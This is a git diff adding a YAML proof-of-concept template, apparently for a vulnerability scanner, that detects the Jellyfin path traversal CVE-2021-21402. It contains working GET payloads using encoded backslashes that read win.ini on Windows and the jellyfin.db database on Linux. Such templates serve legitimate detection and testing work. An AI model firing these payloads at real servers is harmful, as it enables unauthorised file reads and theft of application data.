diff --git a/pocs/jellyfin-cve-2021-21402.yml b/pocs/jellyfin-cve-2021-21402.yml
new file mode 100644
index 000000000..7a57ac6d3
--- /dev/null
+++ b/pocs/jellyfin-cve-2021-21402.yml
@@ -0,0 +1,18 @@
+name: poc-yaml-jellyfin-cve-2021-21402
+groups:
+  Windows:
+    - method: GET
+      path: /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
+      follow_redirects: false
+      expression: |
+        response.status==200 && response.body.bcontains(b"extensions") && response.body.bcontains(b"files")
+  Linux:
+    - method: GET
+      path: /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/
+      follow_redirects: false
+      expression: |
+        response.status==200 && response.body.bcontains(b"SQLite")
+detail:
+  author: Print1n
+  links:
+    - https://www.cnblogs.com/micr067/p/14639162.html